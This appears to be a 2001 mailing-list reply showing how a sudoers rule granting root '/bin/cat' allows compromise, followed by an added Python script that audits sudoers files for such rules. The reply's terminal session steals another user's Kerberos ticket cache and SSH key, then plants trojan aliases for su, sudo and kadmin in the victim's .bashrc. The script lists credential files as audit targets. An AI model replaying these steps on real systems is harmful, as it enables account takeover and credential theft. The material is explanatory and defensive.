On Sat, Jul 07, 2001 at 02:10:09AM +0100, Eric E Moore wrote:
[cut]
> I would be very shocked if you could compromise a system with a
> sudoers entry of:
> me hostname = (root) /bin/cat

Depends on what's on the system. I've thought of four similar ways.

1: With Kerberos, you can steal someone's ticket-granting ticket and use
it until it expires. My example also uses AFS:

| [EMAIL PROTECTED]:~$ klist
| Ticket cache: FILE:/tmp/krb5cc_q5bOCp
| Default principal: [EMAIL PROTECTED]
|
| Valid starting     Expires            Service principal
| 07/06/01 22:29:11  07/07/01 08:29:11  host/[EMAIL PROTECTED]
| 07/06/01 22:29:11  07/07/01 08:29:11  krbtgt/[EMAIL PROTECTED]
| 07/06/01 22:29:11  07/07/01 08:29:11  afs/[EMAIL PROTECTED]
|
|
| Kerberos 4 ticket cache: /tmp/tkt1001
| klist: You have no tickets cached
| [EMAIL PROTECTED]:~$ cd /tmp
| [EMAIL PROTECTED]:/tmp$ ls -al
| total 20
| drwxrwxrwt   3 root  root   1024 Jul  6 22:29 .
| drwxr-xr-x  21 root  root   1024 Jun 27 23:41 ..
| -rw-------   1 waoki waoki   892 Jul  6 01:40 krb5cc_1002
| -rw-------   1 waoki waoki   848 Jul  6 22:22 krb5cc_GMJQN9
| -rw-------   1 test  test    885 Jul  6 22:28 krb5cc_SyJR0W
| -rw-------   1 test  test    885 Jul  6 22:26 krb5cc_YzLI0R
| -rw-------   1 test  test   1243 Jul  6 22:29 krb5cc_q5bOCp
| drwxr-xr-x   2 root  root  12288 Nov 14  2000 lost+found
| [EMAIL PROTECTED]:/tmp$ ls -al /afs/g6net.com/user/waoki/secure
| ls: /afs/g6net.com/user/waoki/secure: Permission denied
| [EMAIL PROTECTED]:/afs/g6net.com/user/waoki$ touch /afs/g6net.com/user/waoki/afile
| touch: creating `/afs/g6net.com/user/waoki/afile': Permission denied

Nope, can't access someone else's homedir...

| [EMAIL PROTECTED]:/tmp$ sudo -v
|
| We trust you have received the usual lecture from the local System
| Administrator. It usually boils down to these two things:
|
|     #1) Respect the privacy of others.
|     #2) Think before you type.
|
| Password for [EMAIL PROTECTED]:

Now we steal a TGT (but we could also go after the keytab)...

| [EMAIL PROTECTED]:/tmp$ sudo /bin/cat krb5cc_GMJQN9 > krb5cc_q5bOCp
| [EMAIL PROTECTED]:/tmp$ aklog

...and now I'm someone else!

| [EMAIL PROTECTED]:/tmp$ klist
| Ticket cache: FILE:/tmp/krb5cc_q5bOCp
| Default principal: [EMAIL PROTECTED]
|
| Valid starting     Expires            Service principal
| 07/06/01 22:21:56  07/07/01 08:21:52  krbtgt/[EMAIL PROTECTED]
| 07/06/01 22:22:03  07/07/01 08:21:52  afs/[EMAIL PROTECTED]
|
|
| Kerberos 4 ticket cache: /tmp/tkt1001
| klist: You have no tickets cached
|
| [EMAIL PROTECTED]:/tmp$ ls -al /afs/g6net.com/user/waoki/secure
| total 4
| drwxr-xr-x  2 waoki waoki 2048 Jul  6 01:39 .
| drwxr-xr-x  5 waoki waoki 2048 Jul  6 22:33 ..
| -rw-r--r--  1 waoki waoki    0 Jul  6 01:39 file

(As an aside, although the 'secure' directory above is mode 755, it's on
AFS, so the Unix mode bits don't apply.)

Now let's set up some trojans:

| [EMAIL PROTECTED]:/tmp$ cp ~/.su.trojan ~/.sudo.trojan ~/.kadmin.trojan /afs/g6net.com/user/waoki/
| [EMAIL PROTECTED]:/tmp$ echo alias su=~/.su.trojan >> /afs/g6net.com/user/waoki/.bashrc
| [EMAIL PROTECTED]:/tmp$ echo alias /bin/su=~/.su.trojan >> /afs/g6net.com/user/waoki/.bashrc
| [EMAIL PROTECTED]:/tmp$ echo alias sudo=~/.sudo.trojan >> /afs/g6net.com/user/waoki/.bashrc
| [EMAIL PROTECTED]:/tmp$ echo alias /usr/bin/sudo=~/.sudo.trojan >> /afs/g6net.com/user/waoki/.bashrc
| [EMAIL PROTECTED]:/tmp$ echo alias kadmin=~/.kadmin.trojan >> /afs/g6net.com/user/waoki/.bashrc
| [EMAIL PROTECTED]:/tmp$ echo alias /usr/sbin/kadmin=~/.kadmin.trojan >> /afs/g6net.com/user/waoki/.bashrc
| [EMAIL PROTECTED]:/tmp$

2: Something similar could be done if someone's ssh identity or id_dsa
keys aren't password protected:

| [EMAIL PROTECTED] test]$ sudo cat /home/waoki/.ssh/id_dsa > .ssh/id_dsa
| [EMAIL PROTECTED] test]$ ssh localhost -l waoki

and now I can trojan apps, or (since the default Debian sudo uses one
timestamp file per user, instead of one per user per tty) I can wait for
the victim to sudo, and then sudo without entering his password.

3 and 4: If the system's running Samba, access to /etc/smbpasswd lets me
log in to Samba as anyone who appears in /etc/smbpasswd. If the system is
using Netatalk with randnum authentication, users' AppleTalk passwords
will be stored in plaintext in ~/.passwd. Once again, I can trojan
binaries and scripts.

Oh, and catting /proc/kcore could yield interesting information.

-- 
William Aoki     [EMAIL PROTECTED]       (801)-(58)5-1924
UMNH Computer Support                      Room 001, GTB
1390 E President's Circle                  (801)-(58)1-6928
Salt Lake City, Utah 84112-0050
Key 199D8C7B  Fingerprint 3B0A 6800 8A1A 78A7 9A26 BB92 6329 2D3E 199D 8C7B
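The thread's point generalises: any sudoers rule that lets a user run a file-reading program as root, with no argument restriction, is an arbitrary-file read, and the files above (credential caches, unencrypted SSH keys, smbpasswd, Netatalk ~/.passwd, /proc/kcore) are what that read buys. The script below is an added example, not code from the message or from the sudo project: it parses a simplified sudoers subset (user host = (runas) [TAG:] cmd, cmd ...), flags read-capable commands, and distinguishes rules that pin the argument from rules that leave it open. The list of "reader" programs and the target list are assumptions drawn from the thread; the sample sudoers text is constructed. Wildcards in arguments are treated as unbounded because sudoers matches the argument string as a whole, so a `*` can span several arguments.

```python
"""Flag sudoers rules whose "harmless" read-only command is an arbitrary-file read as root.

Added example, not from the original post. Handles a simplified sudoers grammar:
    user  host = (runas[:group]) [TAG:] /path/cmd [args], /path/cmd2 ...
"""
import re
from typing import Optional

# Programs whose whole job is to read a file and emit it (assumed list).
# Run as root, each of these reads any file on the system; cp/dd also write.
FILE_READERS = {"cat", "head", "tail", "less", "more", "tac",
                "od", "xxd", "strings", "dd", "cp"}

# What a root-level read exposes, per the thread (assumed paths).
SENSITIVE_TARGETS = {
    "/tmp/krb5cc_*":    "Kerberos 5 credential caches (reuse the TGT until it expires)",
    "/etc/krb5.keytab": "Kerberos keytab (long-lived service keys)",
    "~/.ssh/identity":  "unencrypted SSH1 identity keys",
    "~/.ssh/id_dsa":    "unencrypted SSH2 DSA keys (log in as that user)",
    "/etc/smbpasswd":   "Samba password hashes (SMB login as any listed user)",
    "~/.passwd":        "Netatalk randnum plaintext AppleTalk passwords",
    "/proc/kcore":      "kernel memory image",
}

SUDOERS_KEYWORDS = ("Defaults", "Cmnd_Alias", "User_Alias",
                    "Host_Alias", "Runas_Alias")

RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<cmds>.+)$"
)
TAG_RE = re.compile(r"^[A-Z]+:\s*")   # NOPASSWD:, SETENV:, ...


def parse_rule(line: str) -> Optional[dict]:
    """Parse one sudoers line; return None for comments, blanks, Defaults and aliases."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(SUDOERS_KEYWORDS):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    runas_field = m.group("runas")
    # No "(runas)" means the runas_default, which is root; "(user:group)" keeps the user part.
    runas = (runas_field.split(":", 1)[0].strip() if runas_field else "") or "root"
    cmds = []
    for spec in m.group("cmds").split(","):
        spec = spec.strip()
        while TAG_RE.match(spec):           # strip any number of leading tags
            spec = TAG_RE.sub("", spec, count=1)
        if spec:
            cmds.append(spec)
    return {"user": m.group("user"), "host": m.group("host"),
            "runas": runas, "cmds": cmds}


def classify_command(spec: str) -> Optional[dict]:
    """Return a finding for a read-capable command spec, or None if it is not one."""
    parts = spec.split()
    prog, args = parts[0], parts[1:]
    base = {"command": spec}
    if prog == "ALL":
        return {**base, "unbounded": True, "reason": "ALL: any command"}
    if prog.rsplit("/", 1)[-1] not in FILE_READERS:
        return None
    if not args:
        return {**base, "unbounded": True, "reason": "no argument restriction"}
    if any(ch in a for a in args for ch in "*?["):
        # sudoers matches the argument string as a whole, so a wildcard can
        # absorb extra arguments: "/bin/cat /var/log/messages*" also matches
        # "/bin/cat /var/log/messages /etc/shadow".
        return {**base, "unbounded": True, "reason": "wildcard in arguments"}
    return {**base, "unbounded": False, "reason": "arguments pinned: " + " ".join(args)}


def audit(sudoers_text: str) -> list:
    """Return findings for every read-capable command granted in the sudoers text."""
    findings = []
    for line in sudoers_text.splitlines():
        rule = parse_rule(line)
        if rule is None:
            continue
        for spec in rule["cmds"]:
            hit = classify_command(spec)
            if hit is None:
                continue
            # A read as an unprivileged runas user gains nothing; root (or ALL) reads everything.
            privileged = rule["runas"] in ("root", "ALL")
            exposes = sorted(SENSITIVE_TARGETS) if (hit["unbounded"] and privileged) else []
            findings.append({"user": rule["user"], "host": rule["host"],
                             "runas": rule["runas"], **hit, "exposes": exposes})
    return findings


# Constructed sample, not a real sudoers file.
SAMPLE_SUDOERS = """\
Defaults env_reset
me      hostname = (root) /bin/cat
ops     ALL = NOPASSWD: /bin/tail /var/log/messages
ops     ALL = /bin/cat /var/log/messages*
backup  ALL = (backup) /bin/cat
%admin  ALL=(ALL:ALL) ALL
dbadm   ALL = /sbin/reboot, /bin/head
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_SUDOERS):
        verdict = "ARBITRARY READ AS " + f["runas"] if f["exposes"] else "bounded"
        print(f"{f['user']:8} {f['host']:10} {f['command']:32} {verdict} ({f['reason']})")
        for path in f["exposes"]:
            print(f"{'':52}  -> {path}: {SENSITIVE_TARGETS[path]}")
```

Run it against a real /etc/sudoers (as root, since the file is mode 0440) to see which of the "safe" commands on your hosts are in fact arbitrary reads; the fix is either to pin the argument or to replace the cat rule with a purpose-built wrapper that opens only the file you meant.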